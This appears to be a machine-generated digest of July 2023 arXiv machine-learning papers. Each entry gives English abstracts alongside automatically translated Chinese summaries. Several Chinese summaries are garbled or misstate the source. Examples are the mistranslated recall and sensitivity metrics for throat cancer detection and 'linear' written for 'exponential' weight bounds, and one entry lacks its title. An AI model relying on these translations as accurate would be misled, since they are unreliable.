现在，风能资源已经吸引了越来越多的关注，因为它在碳中和可持续发展中扮演着重要的角色。当风力发电机与电力网络集成时，准确预测成为了系统可持续性和安全性的重要因素。然而，风力预测具有不可预测性和长时间序列预测的特点，使得预测变得特别困难。在这份技术报告中，我们介绍了BERT模型在Baidu KDD杯2022中的应用，并通过后处理来添加日律性，使预测结果与日律性保持一致。我们的解决方案在2490个团队中获得第三名，代码在https://github.com/LongxingTan/KDD2022-Baidu上发布。

Towards Sustainable Deep Learning for Multi-Label Classification on NILM

paper_url: http://arxiv.org/abs/2307.09244
repo_url: None
paper_authors: Anže Pirnat, Blaž Bertalanič, Gregor Cerar, Mihael Mohorčič, Carolina Fortuna
For: The paper is written for the purpose of improving the computation and energy efficiency of deep learning (DL) models for non-intrusive load monitoring (NILM) classification.* Methods: The paper proposes a novel DL model for enhanced multi-label classification of NILM, which is designed to reduce computational and energy demands during training and operation.* Results: The proposed model achieves on average approximately 8 percentage points in performance improvement compared to the state-of-the-art, while reducing the carbon footprint by more than 23%.Here’s the Chinese translation of the three key information points:* For: 本文是为了提高深度学习（DL）模型的计算和能源效率，用于非侵入式电力监测（NILM）分类。* Methods: 本文提出了一种新的DL模型，用于改进NILM多标签分类，以降低训练和运行中的计算和能源需求。* Results: 提议的模型与状态艺术比较，在REFIT和UK-DALE数据集上测试时， average提高了约8%的性能，同时减少了碳脚印的23%以上。

Abstract
Non-intrusive load monitoring (NILM) is the process of obtaining appliance-level data from a single metering point, measuring total electricity consumption of a household or a business. Appliance-level data can be directly used for demand response applications and energy management systems as well as for awareness raising and motivation for improvements in energy efficiency and reduction in the carbon footprint. Recently, classical machine learning and deep learning (DL) techniques became very popular and proved as highly effective for NILM classification, but with the growing complexity these methods are faced with significant computational and energy demands during both their training and operation. In this paper, we introduce a novel DL model aimed at enhanced multi-label classification of NILM with improved computation and energy efficiency. We also propose a testing methodology for comparison of different models using data synthesized from the measurement datasets so as to better represent real-world scenarios. Compared to the state-of-the-art, the proposed model has its carbon footprint reduced by more than 23% while providing on average approximately 8 percentage points in performance improvement when testing on data derived from REFIT and UK-DALE datasets.

摘要
非侵入式电力监测（NILM）是指从单个计量点获取家用电器或商业用电器的具体数据，计算总电力消耗量。家用电器或商业用电器的具体数据可以直接用于需求应答应用和能源管理系统，以及提高能源效率和减少碳足迹。在最近的几年中，传统的机器学习和深度学习（DL）技术在NILM类型分类中变得非常流行，但是随着模型的复杂度的增加，它们面临着显著的计算和能源投入问题。在本文中，我们介绍了一种新的深度学习模型，旨在提高多标签分类的NILM性能。我们还提出了一种测试方法ологи，用于对不同模型进行比较，以更好地 simulate real-world scenarios。相比之前的状态艺术，我们的提案模型可以减少碳脚印的23%以上，并在REFIT和UK-DALE数据集上测试平均提高8个百分点的性能。

Fusing Hand and Body Skeletons for Human Action Recognition in Assembly

paper_url: http://arxiv.org/abs/2307.09238
repo_url: None
paper_authors: Dustin Aganian, Mona Köhler, Benedict Stephan, Markus Eisenbach, Horst-Michael Gross
for: 这篇论文主要是为了提高人机合作的效果，使用机器人在制造过程中协助人类完成Assembly任务。
methods: 该方法使用较为简单的人体骨架，并与高级别的手套骨架结合，使用CNN和转换器来提高人体动作识别率。
results: 该方法在Assembly场景中的人体动作识别率得到了提高，可以帮助机器人更好地协助人类完成Assembly任务。

Abstract
As collaborative robots (cobots) continue to gain popularity in industrial manufacturing, effective human-robot collaboration becomes crucial. Cobots should be able to recognize human actions to assist with assembly tasks and act autonomously. To achieve this, skeleton-based approaches are often used due to their ability to generalize across various people and environments. Although body skeleton approaches are widely used for action recognition, they may not be accurate enough for assembly actions where the worker's fingers and hands play a significant role. To address this limitation, we propose a method in which less detailed body skeletons are combined with highly detailed hand skeletons. We investigate CNNs and transformers, the latter of which are particularly adept at extracting and combining important information from both skeleton types using attention. This paper demonstrates the effectiveness of our proposed approach in enhancing action recognition in assembly scenarios.

摘要
随着协同机器人（COBOT）在工业生产领域的普及，人机合作的效果变得越来越重要。COBOT应该能够认识人类动作，协助Assembly任务，并且可以自动行动。为达到这个目标，skeleton-based方法经常用于人机合作，因为它们可以在不同的人和环境中广泛普适。虽然body skeleton方法广泛用于动作识别，但它们可能无法准确地识别Assembly动作，这是因为工人的手指和手臂在这些动作中扮演着重要的角色。为解决这个限制，我们提议一种方法，即将较为简单的body skeleton与高级细节的手skeleton结合在一起。我们 investigate CNNs和transformers，后者尤其适合从skeleton类型中提取和组合重要信息，使用注意力。本文证明我们提议的方法可以在Assembly场景中提高动作识别的效果。

Detecting Throat Cancer from Speech Signals Using Machine Learning: A Reproducible Literature Review

paper_url: http://arxiv.org/abs/2307.09230
repo_url: None
paper_authors: Mary Paterson, James Moor, Luisa Cutillo
for: 这个研究是对现有文献中的嗓腔癌检测使用机器学习和人工智能的论文进行探讨。
methods: 这些论文使用的方法包括神经网络，并且大多数使用神经网络进行实现。Audio中的多种特征被提取，mel-frequency cepstral coefficients最常用。
results: 我们使用转移学习在多类问题上进行分类，并实现了53.54%的涂抹率，83.14%的敏感率和64.00%的特征率。我们的分类器与同一个数据集上的结果相似。

Abstract
In this work we perform a scoping review of the current literature on the detection of throat cancer from speech recordings using machine learning and artificial intelligence. We find 22 papers within this area and discuss their methods and results. We split these papers into two groups - nine performing binary classification, and 13 performing multi-class classification. The papers present a range of methods with neural networks being most commonly implemented. Many features are also extracted from the audio before classification, with the most common bring mel-frequency cepstral coefficients. None of the papers found in this search have associated code repositories and as such are not reproducible. Therefore, we create a publicly available code repository of our own classifiers. We use transfer learning on a multi-class problem, classifying three pathologies and healthy controls. Using this technique we achieve an unweighted average recall of 53.54%, sensitivity of 83.14%, and specificity of 64.00%. We compare our classifiers with the results obtained on the same dataset and find similar results.

摘要
在这个工作中，我们进行了评估当前文献中用于喉部癌诊断从语音记录中使用机器学习和人工智能的研究。我们找到了22篇相关文献，并讨论了它们的方法和结果。我们将这些文献分为了两组：9篇为二分类，13篇为多类分类。文献中最常用的方法是神经网络。大多数文献在语音分类之前将各种特征提取出来，最常用的是MEL-frequency cepstral coefficients。我们发现所有搜索到的文献都没有关联代码库，因此无法重现。因此，我们创建了一个公共可用的代码库。我们使用传输学习解决多类问题，分类三种疾病和健康控制。使用这种技术，我们获得了无权重平均回归率53.54%，感知率83.14%和特征率64.00%。我们比较了我们的分类器与同一个数据集上的结果，发现结果类似。

How Many Neurons Does it Take to Approximate the Maximum?

paper_url: http://arxiv.org/abs/2307.09212
repo_url: None
paper_authors: Itay Safran, Daniel Reichman, Paul Valiant
for: 本研究旨在探讨一个神经网络可以近似最大函数的大小，在最基本的近似情况下，即使用$L_2$范数，对于连续分布，并使用ReLU激活函数。
methods: 我们提供了新的下界和上界，以评估不同深度的神经网络所需的宽度，以及一个depth $\mathcal{O}(\log(\log(d)))$和宽度 $\mathcal{O}(d)$的建构，可以高效地近似最大函数。
results: 我们的结果显示，在depth 2和depth 3网络之间存在新的深度分离，以及depth 3和depth 5网络之间的深度分离。此外，我们还提供了一个depth $\mathcal{O}(\log(\log(d)))$和宽度 $\mathcal{O}(d)$的建构，可以高效地近似最大函数，远远超过了最好已知的深度 bound。

Abstract
We study the size of a neural network needed to approximate the maximum function over $d$ inputs, in the most basic setting of approximating with respect to the $L_2$ norm, for continuous distributions, for a network that uses ReLU activations. We provide new lower and upper bounds on the width required for approximation across various depths. Our results establish new depth separations between depth 2 and 3, and depth 3 and 5 networks, as well as providing a depth $\mathcal{O}(\log(\log(d)))$ and width $\mathcal{O}(d)$ construction which approximates the maximum function, significantly improving upon the depth requirements of the best previously known bounds for networks with linearly-bounded width. Our depth separation results are facilitated by a new lower bound for depth 2 networks approximating the maximum function over the uniform distribution, assuming an exponential upper bound on the size of the weights. Furthermore, we are able to use this depth 2 lower bound to provide tight bounds on the number of neurons needed to approximate the maximum by a depth 3 network. Our lower bounds are of potentially broad interest as they apply to the widely studied and used \emph{max} function, in contrast to many previous results that base their bounds on specially constructed or pathological functions and distributions.

摘要
我们研究了一个神经网络需要来近似最大函数的大小，在最基本的设定下，即使用$L_2$ нор的近似，并且考虑到连续分布下的情况。我们提供了新的下界和上界，以及对不同深度的数据分布。我们的结果建立了新的深度分隔，包括深度2和3之间的分隔，以及深度3和5之间的分隔。此外，我们还提供了一个depth $\mathcal{O}(\log(\log(d)))$和宽度 $\mathcal{O}(d)$ 的建构，可以将最大函数近似，与之前最好的下界对于线性宽度的网络具有重要的改进。我们的深度分隔结果受到一个新的深度2网络近似最大函数的下界，假设Weight的大小是线性的。此外，我们还可以使用这个深度2下界，提供了对深度3网络近似最大函数的精确的 neuron 数量。我们的下界具有广泛的应用可能性，因为它们应用到了广泛研究和使用的\emph{max}函数，不同于许多先前的结果，它们基于特殊 constructed 或是 Pathological 函数和分布。

Automated Ableism: An Exploration of Explicit Disability Biases in Sentiment and Toxicity Analysis Models

paper_url: http://arxiv.org/abs/2307.09209
repo_url: None
paper_authors: Pranav Narayanan Venkit, Mukund Srinath, Shomir Wilson
for: 本研究旨在探讨 sentiment analysis 和攻击干预模型在探测人际障碍 (PWD) 的表现时是否存在显著的偏见。
methods: 我们使用了 Perturbation Sensitivity Analysis 检测探测 Twitter 和 Reddit 社交媒体平台上关于 PWD 的对话，以获得实际社交场景中如何传播残障偏见的信息。然后，我们创建了 \textit{Bias Identification Test in Sentiment} (BITS) корпуス，以量化任何 sentiment analysis 和攻击干预模型中的直接残障偏见。
results: 我们的研究发现，这些open AIaaS sentiment analysis 工具（包括 TextBlob、VADER、Google Cloud Natural Language API 和 DistilBERT）以及两个攻击干预模型（包括 two versions of Toxic-BERT）都存在显著的直接残障偏见。

Abstract
We analyze sentiment analysis and toxicity detection models to detect the presence of explicit bias against people with disability (PWD). We employ the bias identification framework of Perturbation Sensitivity Analysis to examine conversations related to PWD on social media platforms, specifically Twitter and Reddit, in order to gain insight into how disability bias is disseminated in real-world social settings. We then create the \textit{Bias Identification Test in Sentiment} (BITS) corpus to quantify explicit disability bias in any sentiment analysis and toxicity detection models. Our study utilizes BITS to uncover significant biases in four open AIaaS (AI as a Service) sentiment analysis tools, namely TextBlob, VADER, Google Cloud Natural Language API, DistilBERT and two toxicity detection models, namely two versions of Toxic-BERT. Our findings indicate that all of these models exhibit statistically significant explicit bias against PWD.

摘要
我们对偏见检测和负面情绪检测模型进行分析，以检测对人障（PWD）的直接偏见。我们使用扰动敏感性分析框架来分析社交媒体平台上关于PWD的对话，以获得实际社会中对障碍偏见的准确情况。然后，我们创建了《偏见标准测试集》（BITS）来衡量任何情感分析和负面情绪检测模型中的直接障碍偏见。我们的研究使用BITS来揭示四个开放的 AIaaS（人工智能 как服务）情感分析工具——TextBlob、VADER、Google Cloud Natural Language API和DistilBERT——以及两个负面情绪检测模型——两个版本的 Toxic-BERT——中的明显偏见。我们的发现表明，这些模型都存在 statistically significant的直接障碍偏见。

paper_url: http://arxiv.org/abs/2307.09206
repo_url: None
paper_authors: Suresh Guttikonda, Jan Achterhold, Haolong Li, Joschka Boedecker, Joerg Stueckler
For: 本研究目的是开发一种能够适应不同环境和机器人属性变化的自主导航方法。* Methods: 本研究使用了基于神经过程的meta-学前向动力学模型，以适应不同地形和机器人动力学变化。* Results: 实验表明，提出的模型在长期轨迹预测任务中的预测误差较低，而且在自主规划控制任务中也能够更好地规划控制路径。

Abstract
In autonomous navigation settings, several quantities can be subject to variations. Terrain properties such as friction coefficients may vary over time depending on the location of the robot. Also, the dynamics of the robot may change due to, e.g., different payloads, changing the system's mass, or wear and tear, changing actuator gains or joint friction. An autonomous agent should thus be able to adapt to such variations. In this paper, we develop a novel probabilistic, terrain- and robot-aware forward dynamics model, termed TRADYN, which is able to adapt to the above-mentioned variations. It builds on recent advances in meta-learning forward dynamics models based on Neural Processes. We evaluate our method in a simulated 2D navigation setting with a unicycle-like robot and different terrain layouts with spatially varying friction coefficients. In our experiments, the proposed model exhibits lower prediction error for the task of long-horizon trajectory prediction, compared to non-adaptive ablation models. We also evaluate our model on the downstream task of navigation planning, which demonstrates improved performance in planning control-efficient paths by taking robot and terrain properties into account.

摘要
在自主导航设置下，许多量值可能会受到变化。地形特性，如摩擦系数，随时间的变化可能会影响机器人的位置。此外，机器人的动力学也可能会发生变化，例如不同的负荷、系统质量的变化、 actuator gain 或 JOINT 摩擦的变化。因此，一个自主智能体应该能够适应这些变化。在这篇论文中，我们开发了一种新的probabilistic，地形和机器人意识的前瞻动力学模型，称为 TRADYN，它能够适应以上所 mention 的变化。它基于最近的前瞻动力学模型基于神经过程的meta-学进步。我们在一个模拟的2D导航设置中使用了一种unicycle-like 机器人和不同的地形布局，并对其进行了评估。在我们的实验中，提议的模型在长期轨迹预测任务中表现出较低的预测错误，相比非适应模型。此外，我们还评估了我们的模型在导航规划任务中的表现，其表现出了改进的控制效率的规划路径。

Learning Dynamic Attribute-factored World Models for Efficient Multi-object Reinforcement Learning

paper_url: http://arxiv.org/abs/2307.09205
repo_url: None
paper_authors: Fan Feng, Sara Magliacane
for: 这个论文的目的是提高强化学习任务中agent的扩展性和可重复性，使其能够在不同的物体和属性下进行学习和执行任务。
methods: 这个论文使用了对象中心表示学习来提取视觉输入中的物体，并将其分类为不同的类别。然后，对每个类别的物体，学习一个类模板图，描述了这种物体的动力和奖励如何因属性分解。还学习了对象之间的互动模式图，描述了不同类别的物体之间的互动。通过这些图和动态互动图，学习出一个策略，可以在新环境中直接应用。
results: 在三个标准 dataset上测试了这个框架，并证明了它在未seen的物体、属性和潜在参数下进行扩展和可重复性的任务时表现出色，以及在组合已知任务时的表现也是比较好的。

Abstract
In many reinforcement learning tasks, the agent has to learn to interact with many objects of different types and generalize to unseen combinations and numbers of objects. Often a task is a composition of previously learned tasks (e.g. block stacking). These are examples of compositional generalization, in which we compose object-centric representations to solve complex tasks. Recent works have shown the benefits of object-factored representations and hierarchical abstractions for improving sample efficiency in these settings. On the other hand, these methods do not fully exploit the benefits of factorization in terms of object attributes. In this paper, we address this opportunity and introduce the Dynamic Attribute FacTored RL (DAFT-RL) framework. In DAFT-RL, we leverage object-centric representation learning to extract objects from visual inputs. We learn to classify them in classes and infer their latent parameters. For each class of object, we learn a class template graph that describes how the dynamics and reward of an object of this class factorize according to its attributes. We also learn an interaction pattern graph that describes how objects of different classes interact with each other at the attribute level. Through these graphs and a dynamic interaction graph that models the interactions between objects, we can learn a policy that can then be directly applied in a new environment by just estimating the interactions and latent parameters. We evaluate DAFT-RL in three benchmark datasets and show our framework outperforms the state-of-the-art in generalizing across unseen objects with varying attributes and latent parameters, as well as in the composition of previously learned tasks.

摘要
在许多强化学习任务中，机器人需要学习与多种不同类型的物体交互，并泛化到未经见过的组合和数量。经常情况下，任务是一个各种已经学习过的任务的组合（例如堆叠块）。这些任务是物体中心的泛化，在这些情况下，我们可以通过物体中心的表示学习来解决复杂任务。在这篇论文中，我们提出了动态特征划分RL（DAFT-RL）框架。在DAFT-RL中，我们利用物体中心的表示学习来提取视觉输入中的物体。我们可以将它们分类为类别，并且从属特征参数的推断。对于每个类型的物体，我们学习一个类型图，该图描述了物体的动力学和奖励因为其特征的分解。我们还学习了不同类型物体之间的交互图，该图描述了物体之间的特征级别交互。通过这些图和动态交互图，我们可以学习一个策略，该策略可以在新环境中直接应用，只需要估计交互和隐藏参数。我们在三个标准数据集上进行了评估，并证明了我们的框架在未经见过的物体特征和隐藏参数的泛化，以及在组合已经学习过的任务中表现出色。

Federated Learning for Computationally-Constrained Heterogeneous Devices: A Survey

paper_url: http://arxiv.org/abs/2307.09182
repo_url: None
paper_authors: Kilian Pfeiffer, Martin Rapp, Ramin Khalili, Jörg Henkel
for: 提高用户隐私和减少中心服务器的负担，实现在设备上进行神经网络训练。
methods: 联邦学习（Federated Learning）技术，通过共享设备之间的知识，保持用户隐私，同时提高模型精度。
results: 在具有多种设备的不同硬件和软件环境中，联邦学习技术面临着多种差异和挑战，需要采取多种策略来减少这些差异，以提高模型精度和可靠性。

Abstract
With an increasing number of smart devices like internet of things (IoT) devices deployed in the field, offloadingtraining of neural networks (NNs) to a central server becomes more and more infeasible. Recent efforts toimprove users' privacy have led to on-device learning emerging as an alternative. However, a model trainedonly on a single device, using only local data, is unlikely to reach a high accuracy. Federated learning (FL)has been introduced as a solution, offering a privacy-preserving trade-off between communication overheadand model accuracy by sharing knowledge between devices but disclosing the devices' private data. Theapplicability and the benefit of applying baseline FL are, however, limited in many relevant use cases dueto the heterogeneity present in such environments. In this survey, we outline the heterogeneity challengesFL has to overcome to be widely applicable in real-world applications. We especially focus on the aspect ofcomputation heterogeneity among the participating devices and provide a comprehensive overview of recentworks on heterogeneity-aware FL. We discuss two groups: works that adapt the NN architecture and worksthat approach heterogeneity on a system level, covering Federated Averaging (FedAvg), distillation, and splitlearning-based approaches, as well as synchronous and asynchronous aggregation schemes.

摘要
随着智能设备的数量不断增加，如物联网（IoT）设备，将神经网络（NN）的训练卷积到中央服务器上成为了不可能的。随后，为了保护用户隐私，在设备上进行学习（On-Device Learning）已经成为了一个可行的选择。然而，基于单个设备和本地数据进行训练的模型很难达到高精度。为了解决这个问题，联邦学习（Federated Learning，FL）已经被提出，它可以在保护设备私钥数据的同时，通过共享设备之间的知识，实现私钥数据不泄露的高精度模型训练。然而，FL在许多实际应用场景中的可应用性和优势受到了多种多样性的限制。在这篇简述中，我们描述了FL面临的多样性挑战，特别是设备计算能力的多样性，并提供了一个全面的最新研究综述。我们将分为两组：一组是改进神经网络架构的方法，另一组是在系统层面进行多样性处理的方法，包括联邦平均（FedAvg）、液化、分布式学习等方法，以及同步和异步聚合方案。

ECSIC: Epipolar Cross Attention for Stereo Image Compression

paper_url: http://arxiv.org/abs/2307.10284
repo_url: None
paper_authors: Matthias Wödlinger, Jan Kotera, Manuel Keglevic, Jan Xu, Robert Sablatnig
for: 这个论文是为了提出一种新的学习基于方法，用于压缩立体图像。
methods: 该方法利用了两个 Stero Context 模块和一个 Stero Cross Attention（SCA）模块来同时压缩左右图像。SCA模块在相对应的epipolar线上进行了交叉注意力，并在平行进行处理。
results: 对比其他方法，ECSIC 在 Cityscapes 和 InStereo2k 两个 популяр的立体图像数据集上达到了最佳性能，同时允许快速编码和解码，非常适合实时应用。

Abstract
In this paper, we present ECSIC, a novel learned method for stereo image compression. Our proposed method compresses the left and right images in a joint manner by exploiting the mutual information between the images of the stereo image pair using a novel stereo cross attention (SCA) module and two stereo context modules. The SCA module performs cross-attention restricted to the corresponding epipolar lines of the two images and processes them in parallel. The stereo context modules improve the entropy estimation of the second encoded image by using the first image as a context. We conduct an extensive ablation study demonstrating the effectiveness of the proposed modules and a comprehensive quantitative and qualitative comparison with existing methods. ECSIC achieves state-of-the-art performance among stereo image compression models on the two popular stereo image datasets Cityscapes and InStereo2k while allowing for fast encoding and decoding, making it highly practical for real-time applications.

摘要
在这篇论文中，我们提出了一种新的学习方法 для顺帧图像压缩，称为ECSIC。我们的提议方法将左右图像压缩在一起，通过利用顺帧图像对的相互信息来进行压缩。我们使用了一种新的顺帧相关注意力（SCA）模块和两个顺帧上下文模块来实现这一目标。SCA模块在相应的轴线上进行交叉注意力限制，并在平行进行处理。两个顺帧上下文模块使得第二个编码图像的Entropy估计得到改善，通过使用第一个图像作为 Context。我们进行了广泛的缺省研究，并对现有方法进行了全面的量化和质量比较。ECSIC在Cityscapes和InStereo2k两个流行的顺帧图像数据集上实现了顺帧图像压缩模型的状态机器，同时具有快速编码和解码功能，因此在实时应用中非常实用。

Towards Trustworthy Dataset Distillation

paper_url: http://arxiv.org/abs/2307.09165
repo_url: None
paper_authors: Shijie Ma, Fei Zhu, Zhen Cheng, Xu-Yao Zhang
for: Trustworthy Dataset Distillation (TrustDD) aims to reduce training costs and enhance the trustworthiness of deep learning models in real-world applications by distilling both in-distribution (InD) samples and outliers.methods: The proposed method utilizes dataset distillation (DD) to condenses large datasets into tiny synthetic datasets, and introduces Pseudo-Outlier Exposure (POE) to generate pseudo-outliers and enhance OOD detection.results: Comprehensive experiments on various settings demonstrate the effectiveness of TrustDD, and the proposed POE surpasses state-of-the-art method Outlier Exposure (OE). TrustDD is more trustworthy and applicable to real open-world scenarios compared to preceding DD methods.Here’s the simplified Chinese version:for: TrustDD 目的是提高深度学习模型在实际应用中的可靠性和训练效率，通过将大量数据筛选到简单的Synthetic dataset中。methods: TrustDD 使用 dataset distillation (DD) 将大量数据筛选到简单的 Synthetic dataset 中，并引入 Pseudo-Outlier Exposure (POE) 生成 Pseudo-outlier 并提高 OOD 检测。results: 各种设置的 comprehensive 实验表明 TrustDD 的有效性，并且提出的 POE 超越了state-of-the-art 方法 Outlier Exposure (OE)。TrustDD 比前一代 DD 方法更可靠和适用于实际开放世界应用场景。

Abstract
Efficiency and trustworthiness are two eternal pursuits when applying deep learning in real-world applications. With regard to efficiency, dataset distillation (DD) endeavors to reduce training costs by distilling the large dataset into a tiny synthetic dataset. However, existing methods merely concentrate on in-distribution (InD) classification in a closed-world setting, disregarding out-of-distribution (OOD) samples. On the other hand, OOD detection aims to enhance models' trustworthiness, which is always inefficiently achieved in full-data settings. For the first time, we simultaneously consider both issues and propose a novel paradigm called Trustworthy Dataset Distillation (TrustDD). By distilling both InD samples and outliers, the condensed datasets are capable to train models competent in both InD classification and OOD detection. To alleviate the requirement of real outlier data and make OOD detection more practical, we further propose to corrupt InD samples to generate pseudo-outliers and introduce Pseudo-Outlier Exposure (POE). Comprehensive experiments on various settings demonstrate the effectiveness of TrustDD, and the proposed POE surpasses state-of-the-art method Outlier Exposure (OE). Compared with the preceding DD, TrustDD is more trustworthy and applicable to real open-world scenarios. Our code will be publicly available.

摘要
“效率和可靠性是深度学习应用实际场景中的两大永恒追求。在这个领域，数据集缩写（DD）尝试通过缩写大数据集为一个小型的合成数据集来减少训练成本。然而，现有方法仅关注在关闭世界设定下的内部分布（InD）类别，忽略了外部分布（OOD）样本。然而，OOD检测的目的是增强模型的可靠性，这通常在全数据设定下是不fficient的。为了解决这些问题，我们同时考虑了这两个问题，并提出了一种新的思路called Trustworthy Dataset Distillation（TrustDD）。通过缩写InD样本和异常样本，缩写后的数据集可以训练能够在InD类别和OOD检测中具备竞争力。为了避免实际异常数据的需求和使OOD检测更实用，我们进一步提出了 Pseudo-Outlier Exposure（POE）。我们对不同的设定进行了广泛的实验，并证明了 TrustDD 的有效性，而我们提出的 POE 超过了现有的 Outlier Exposure（OE）方法。相比之下，TrustDD 更加可靠和适用于真实的开放世界场景。我们的代码将在公共可用。”

MVA2023 Small Object Detection Challenge for Spotting Birds: Dataset, Methods, and Results

paper_url: http://arxiv.org/abs/2307.09143
repo_url: https://github.com/iim-ttij/mva2023smallobjectdetection4spottingbirds
paper_authors: Yuki Kondo, Norimichi Ukita, Takayuki Yamaguchi, Hao-Yu Hou, Mu-Yi Shen, Chia-Chi Hsu, En-Ming Huang, Yu-Chen Huang, Yu-Cheng Xia, Chien-Yao Wang, Chun-Yi Lee, Da Huo, Marc A. Kastner, Tingwei Liu, Yasutomo Kawanishi, Takatsugu Hirayama, Takahiro Komamizu, Ichiro Ide, Yosuke Shinya, Xinyao Liu, Guang Liang, Syusuke Yasui
for: 本研究旨在提出一个新的小物体检测数据集，以便进行远程小物体检测的实际应用。
methods: 本文提出了一种新的小物体检测方法，并在223名参与者的挑战中评测了其效果。
results: 研究发现，使用这种新方法可以在远程小物体检测中获得优秀的效果，并且提供了一个大量的小物体检测数据集和基eline代码以便进一步研究。

Abstract
Small Object Detection (SOD) is an important machine vision topic because (i) a variety of real-world applications require object detection for distant objects and (ii) SOD is a challenging task due to the noisy, blurred, and less-informative image appearances of small objects. This paper proposes a new SOD dataset consisting of 39,070 images including 137,121 bird instances, which is called the Small Object Detection for Spotting Birds (SOD4SB) dataset. The detail of the challenge with the SOD4SB dataset is introduced in this paper. In total, 223 participants joined this challenge. This paper briefly introduces the award-winning methods. The dataset, the baseline code, and the website for evaluation on the public testset are publicly available.

摘要
小物体检测（SOD）是机器视觉领域的重要话题，因为（i）许多现实世界应用需要对远距离的物体进行检测，以及（ii）SOD是一项复杂的任务，因为小物体的图像表现具有噪声、模糊和不具有很多信息。这篇论文提出了一个新的SOD数据集，包括39,070张图像和137,121只鸟类实例，称为Small Object Detection for Spotting Birds（SOD4SB）数据集。本文介绍了SOD4SB数据集的挑战。总共有223名参与者参加了这个挑战。本文 briefly introduce了获奖方法。数据集、基线代码和评估网站对公共测试集进行评估是公共可用的。

Characterization of partial wetting by CMAS droplets using multiphase many-body dissipative particle dynamics and data-driven discovery based on PINNs

paper_url: http://arxiv.org/abs/2307.09142
repo_url: None
paper_authors: Elham Kiyani, Mahdi Kooshkbaghi, Khemraj Shukla, Rahul Babu Koneru, Zhen Li, Luis Bravo, Anindya Ghoshal, George Em Karniadakis, Mikko Karttunen
For: 这研究探讨了高熔率的CMAS液滴在不同初始尺寸和稳定接触角下的湿润动态。* Methods: 这研究使用多相多体积耗散动力学（mDPD）模拟，研究CMAS液滴的湿润动态。使用Physics-Informed Neural Network（PINN）框架确定湿润半径行为。使用符号回归来表示关系函数。* Results: 研究发现了CMAS液滴的湿润半径行为，并使用Bayesian PINNs（B-PINNs）评估和量化相关参数的不确定性。这研究将湿润动态模拟和机器学习技术结合，为高温应用提供了创新解决方案。

Abstract
The molten sand, a mixture of calcia, magnesia, alumina, and silicate, known as CMAS, is characterized by its high viscosity, density, and surface tension. The unique properties of CMAS make it a challenging material to deal with in high-temperature applications, requiring innovative solutions and materials to prevent its buildup and damage to critical equipment. Here, we use multiphase many-body dissipative particle dynamics (mDPD) simulations to study the wetting dynamics of highly viscous molten CMAS droplets. The simulations are performed in three dimensions, with varying initial droplet sizes and equilibrium contact angles. We propose a coarse parametric ordinary differential equation (ODE) that captures the spreading radius behavior of the CMAS droplets. The ODE parameters are then identified based on the Physics-Informed Neural Network (PINN) framework. Subsequently, the closed form dependency of parameter values found by PINN on the initial radii and contact angles are given using symbolic regression. Finally, we employ Bayesian PINNs (B-PINNs) to assess and quantify the uncertainty associated with the discovered parameters. In brief, this study provides insight into spreading dynamics of CMAS droplets by fusing simple parametric ODE modeling and state-of-the-art machine learning techniques.

摘要
熔融砂粒材料（CMAS），它是含 calcium、magnesia、alumina 和 silicate 的混合物，具有高粘度、密度和表面张力。由于 CMAS 的特有性，在高温应用中处理它是一项挑战，需要创新的解决方案和材料来避免它的堆积和设备损害。在这里，我们使用多相多体积排斥凝聚 dynamics（mDPD）仿真来研究高粘度熔融 CMAS 液滴的湿润动力学。仿真在三维空间中进行，初始液滴尺寸和均衡接触角度进行变化。我们提出了一个粗略的常数参数方程（ODE），捕捉液滴的扩散半径行为。ODE 参数的标准值 Subsequently, the closed form dependency of parameter values found by PINN on the initial radii and contact angles are given using symbolic regression. Finally, we employ Bayesian PINNs (B-PINNs) to assess and quantify the uncertainty associated with the discovered parameters. In brief, this study provides insight into spreading dynamics of CMAS droplets by fusing simple parametric ODE modeling and state-of-the-art machine learning techniques.

Mining of Single-Class by Active Learning for Semantic Segmentation

paper_url: http://arxiv.org/abs/2307.09109
repo_url: None
paper_authors: Hugues Lambert, Emma Slade
for: 本研究的目的是提出一种基于深度优化学习的活动学习策略，以提高特定类型的模型训练效果。
methods: 本研究使用的方法是基于深度优化学习的 MiSiCAL 方法，它可以通过量精度相关性来建立高性能的模型训练集。 MiSiCAL 方法不需要重新训练目标模型多次，因此适用于大批量训练。
results: 研究结果表明，MiSiCAL 方法能够在 COCO10k 数据集上 OUTPERFORM 随机策略的 150 个类型，而最强的基线方法只能 OUTPERFORM 随机策略的 101 个类型。

Abstract
Several Active Learning (AL) policies require retraining a target model several times in order to identify the most informative samples and rarely offer the option to focus on the acquisition of samples from underrepresented classes. Here the Mining of Single-Class by Active Learning (MiSiCAL) paradigm is introduced where an AL policy is constructed through deep reinforcement learning and exploits quantity-accuracy correlations to build datasets on which high-performance models can be trained with regards to specific classes. MiSiCAL is especially helpful in the case of very large batch sizes since it does not require repeated model training sessions as is common in other AL methods. This is thanks to its ability to exploit fixed representations of the candidate data points. We find that MiSiCAL is able to outperform a random policy on 150 out of 171 COCO10k classes, while the strongest baseline only outperforms random on 101 classes.

摘要
几种活动学习（AL）策略需要重新训练目标模型多次以确定最有用的样本并rarely提供针对少 представohn classes 的集中着注意力选择样本的选择。在这里，我们介绍了一种名为MINING SINGLE-CLASS BY ACTIVE LEARNING（MiSiCAL）的策略，通过深度强化学习构建了一个AL策略，利用量精度相关性来建立高性能模型可以在特定类上训练。MiSiCAL在大批量时 particuarily helpful，因为它不需要重复的模型训练会议。这是因为它可以利用固定表示的候选数据点。我们发现MiSiCAL可以在150个COCO10k类中超过随机策略，而最强基eline只能在101个类中超过随机策略。

paper_url: http://arxiv.org/abs/2307.09093
repo_url: None
paper_authors: Saeed Ghoorchian, Setareh Maghsudi
for: The paper is written for solving the problem of sequential decision-making under uncertainty with long feedback delays, particularly in non-stationary environments with structural dependencies amongst the reward distributions.
methods: The paper proposes a policy that learns the causal relations between the arms using a stationary structural equation model, and utilizes this knowledge to optimize the decision-making while adapting to drifts.
results: The paper proves a regret bound for the performance of the proposed algorithm, and evaluates the method via numerical analysis using synthetic and real-world datasets to detect the regions that contribute the most to the spread of Covid-19 in Italy.

Abstract
Sequential decision-making under uncertainty is often associated with long feedback delays. Such delays degrade the performance of the learning agent in identifying a subset of arms with the optimal collective reward in the long run. This problem becomes significantly challenging in a non-stationary environment with structural dependencies amongst the reward distributions associated with the arms. Therefore, besides adapting to delays and environmental changes, learning the causal relations alleviates the adverse effects of feedback delay on the decision-making process. We formalize the described setting as a non-stationary and delayed combinatorial semi-bandit problem with causally related rewards. We model the causal relations by a directed graph in a stationary structural equation model. The agent maximizes the long-term average payoff, defined as a linear function of the base arms' rewards. We develop a policy that learns the structural dependencies from delayed feedback and utilizes that to optimize the decision-making while adapting to 